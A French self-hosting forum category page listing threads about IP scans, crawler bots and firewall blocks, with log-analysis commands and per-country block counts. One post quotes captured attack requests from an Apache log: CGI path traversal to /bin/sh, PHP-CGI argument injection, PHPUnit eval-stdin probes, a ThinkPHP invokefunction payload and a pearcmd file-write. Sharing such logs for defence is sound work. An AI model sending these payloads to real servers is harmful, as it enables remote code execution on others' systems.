Aller directement au contenu

Scan Attack

224 Sujets 294 Messages

Scan IP

Cette catégorie peut être suivie depuis le web social ouvert via le pseudo scan@lemmy.cyber-neurones.org

Sous-catégories


  • 3 10
    3 Sujets
    10 Messages
    fariasF
    Sur un seul jours, j’ai 11617 blocage IP… # cat /var/log/pve-firewall.log | sed 's/2025:/2025 /g' | awk '{print $3 " " $4}' | grep "GROUP" | sort -n | uniq -c 11617 GROUP-attack-IN 01/Dec/2025 2 GROUP-attackmail-IN 01/Dec/2025 4417 GROUP-ccbot-IN 01/Dec/2025 10 GROUP-honeypot-IN 01/Dec/2025 30 GROUP-huawei-IN 01/Dec/2025 7 GROUP-russian-IN 01/Dec/2025
  • A place to talk about whatever you want

    5 11
    5 Sujets
    11 Messages
    F
    # grep "198.23.190.58" /var/log/asterisk/full | wc -l 156
  • Scan of ip 193.26.115.195

    1
    0 Votes
    1 Messages
    5 Vues
    Personne n'a répondu
  • Scan of ip 20.222.66.73

    1
    0 Votes
    1 Messages
    4 Vues
    Personne n'a répondu
  • scan of ip 185.52.207.248 libredtail-http

    1
    0 Votes
    1 Messages
    4 Vues
    Personne n'a répondu
  • scan of ip 52.178.223.71

    1
    0 Votes
    1 Messages
    5 Vues
    Personne n'a répondu
  • Scan of IP 209.126.5.94 libredtail-http

    1
    0 Votes
    1 Messages
    4 Vues
    Personne n'a répondu
  • Scan de CCbot

    22
    0 Votes
    22 Messages
    343 Vues
    fariasF
    Le prix sur les architectures de CCbot est énorme : [image: 1762611836091-5652ae1b-a0b5-48a2-83d5-e4175a3796ea-image.png]
  • Scan IP 20.243.50.65

    1
    0 Votes
    1 Messages
    3 Vues
    Personne n'a répondu
  • Scan IP 20.78.70.188

    1
    0 Votes
    1 Messages
    4 Vues
    Personne n'a répondu
  • Scan IP 157.245.228.37

    1
    0 Votes
    1 Messages
    6 Vues
    Personne n'a répondu
  • Scan IP 221.159.119.6

    1
    0 Votes
    1 Messages
    4 Vues
    Personne n'a répondu
  • Bucklog SARL, le CCBot francais ... Misère

    1
    0 Votes
    1 Messages
    14 Vues
    Personne n'a répondu
  • Blocage des IP de Dataforseo-bot : DataForSeoBot/1.0

    1
    0 Votes
    1 Messages
    12 Vues
    Personne n'a répondu
  • Audit sur le nombre d'IP bloqué sur mon Proxmox

    2
    0 Votes
    2 Messages
    16 Vues
    fariasF
    $ cat full-reject.txt | xargs -n 1 geoiplookup { } | sort | uniq -c | sort -n | sed -r 's/ GeoIP Country Edition://g' 1 AO, Angola 1 BE, Belgium 1 BN, Brunei Darussalam 1 can't resolve hostname ( 2606:4700:3037::ac43:cc71 ) 1 CI, Cote D'Ivoire 1 GH, Ghana 1 HR, Croatia 1 JM, Jamaica 1 LT, Lithuania 1 LV, Latvia 1 MD, Moldova, Republic of 1 MM, Myanmar 1 MN, Mongolia 1 NG, Nigeria 1 PT, Portugal 1 SA, Saudi Arabia 1 SI, Slovenia 1 SO, Somalia 1 SY, Syrian Arab Republic 1 UG, Uganda 1 GeoIP Country V6 Edition: can't resolve hostname ( 2606:4700:3037::ac43:cc71 ) 2 GE, Georgia 2 KN, Saint Kitts and Nevis 2 MK, Macedonia 2 PR, Puerto Rico 2 SK, Slovakia 3 CY, Cyprus 3 ET, Ethiopia 3 HU, Hungary 3 KG, Kyrgyzstan 3 MC, Monaco 3 MU, Mauritius 3 QA, Qatar 3 SN, Senegal 3 SV, El Salvador 4 AL, Albania 4 AM, Armenia 4 GA, Gabon 4 JO, Jordan 4 LB, Lebanon 4 OM, Oman 4 TT, Trinidad and Tobago 5 BW, Botswana 9 BA, Bosnia and Herzegovina 9 CZ, Czech Republic 10 KW, Kuwait 11 DZ, Algeria 12 BO, Bolivia 12 GT, Guatemala 16 IS, Iceland 18 AZ, Azerbaijan 20 UZ, Uzbekistan 27 TN, Tunisia 34 AT, Austria 34 EE, Estonia 37 IQ, Iraq 39 EG, Egypt 40 UY, Uruguay 42 MA, Morocco 258 AP, Asia/Pacific Region 258 EU, Europe 260 PA, Panama 260 TR, Turkey 261 CR, Costa Rica 265 RS, Serbia 267 KZ, Kazakhstan 270 KE, Kenya 513 FI, Finland 513 NI, Nicaragua 770 PL, Poland 770 RO, Romania 1024 PF, French Polynesia 1026 PS, Palestinian Territory 1027 SC, Seychelles 1036 BG, Bulgaria 1040 KP, Korea, Democratic People's Republic of 1125 IL, Israel 1341 PE, Peru 1972 NL, Netherlands 2048 VU, Vanuatu 2050 KH, Cambodia 2058 HN, Honduras 2848 VE, Venezuela 2941 CH, Switzerland 3095 IP Address not found 3140 CL, Chile 3239 ZA, South Africa 3432 BH, Bahrain 3608 DO, Dominican Republic 3663 PY, Paraguay 3696 CO, Colombia 3891 UA, Ukraine 4162 NZ, New Zealand 8192 FJ, Fiji 8195 LK, Sri Lanka 11264 NC, New Caledonia 13849 PK, Pakistan 16384 MO, Macau 17785 SE, Sweden 19555 ES, Spain 24887 AR, Argentina 34823 NP, Nepal 35697 BD, Bangladesh 67514 EC, Ecuador 67840 TH, Thailand 68776 IT, Italy 78941 MX, Mexico 81409 PH, Philippines 101737 ID, Indonesia 113413 TW, Taiwan 133730 AE, United Arab Emirates 170330 MY, Malaysia 285170 FR, France 526851 BY, Belarus 538991 CA, Canada 671345 HK, Hong Kong 697025 IN, India 1340962 KR, Korea, Republic of 1344984 GB, United Kingdom 1416874 AU, Australia 1450519 IR, Iran, Islamic Republic of 1481058 BR, Brazil 1922796 SG, Singapore 2180768 RU, Russian Federation 3433168 DE, Germany 4220007 IE, Ireland 4266170 JP, Japan 7136014 VN, Vietnam 13160884 CN, China 31585710 US, United States
  • Attack de Immich par Tencent Cloud Computing (Beijing) Co., Ltd

    1
    0 Votes
    1 Messages
    18 Vues
    Personne n'a répondu
  • Scan IONOS SE : 217.154.8.114

    2
    0 Votes
    2 Messages
    12 Vues
    fariasF
    Mais aussi : # grep "^217.154.8.45 " /var/log/apache2/access.*.log | awk '{print $6 " " $7 " " $8}' "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\"hi\"));?>+/tmp/index1.php HTTP/1.1" "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" "GET /containers/json HTTP/1.1"
  • Scan sur tiny.php

    2
    0 Votes
    2 Messages
    23 Vues
    fariasF
    Scan sur chosen.php : # grep "/chosen.php" /var/log/apache2/access.*.log | sed 's/:/ /g' | awk '{print $2}' | sort | uniq -c 2 5.188.167.226 2 89.21.132.85 2 95.165.10.241
  • Scan de l'IP 196.251.69.173 sur mon Immich ... Bizarre.

    2
    0 Votes
    2 Messages
    10 Vues
    fariasF
    # zgrep "GET /_app/immutable/chunks" //var/log/apache2/access.photo-ssl.log*gz | grep "python-httpx/0.28.1" | sed 's/:/ /g' | awk '{print $2}' | sort -n | uniq -c 10 84.20.18.75 10 192.159.99.155 30 196.251.69.173
  • Scan of ip 63.177.94.5 (Amazon)

    1
    0 Votes
    1 Messages
    7 Vues
    Personne n'a répondu
  • Scan IP 88.214.50.0/24

    1
    1
    0 Votes
    1 Messages
    8 Vues
    Personne n'a répondu
  • Scan of ip 185.85.205.122 Istanbul

    1
    0 Votes
    1 Messages
    9 Vues
    Personne n'a répondu